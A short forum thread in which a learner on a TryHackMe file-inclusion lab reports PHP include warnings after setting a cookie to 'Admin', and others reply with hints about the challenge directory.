In the room https://tryhackme.com/r/room/fileinc Challenge 2 i changed to Cookie value to Admin and i'm getting the following error Warning: include(includes/Admin.php) [function.include]: failed to open stream: No such file or directory in /var/www/html/chall2.php on line 37

Warning: include() [function.include]: Failed opening 'includes/Admin.php' for inclusion (include_path='.:/usr/lib/php5.2/lib/php') in /var/www/html/chall2.php on line 37

Check the directory

You are doing playground challenge i suppose

You need to go to challenges directory to solve the questions

You can solve the last rfi challenge in playground

Thanks for your reply. I am working in challenge 2 http://10.10.240.70/challenges/chall2.php

Gave +1 Rep to @boreal notch (current: #2147 - 1)

Go ahead

And I am getting this message Warning: include(includes/Admin.php) [function.include]: failed to open stream: No such file or directory in /var/www/html/chall2.php on line 37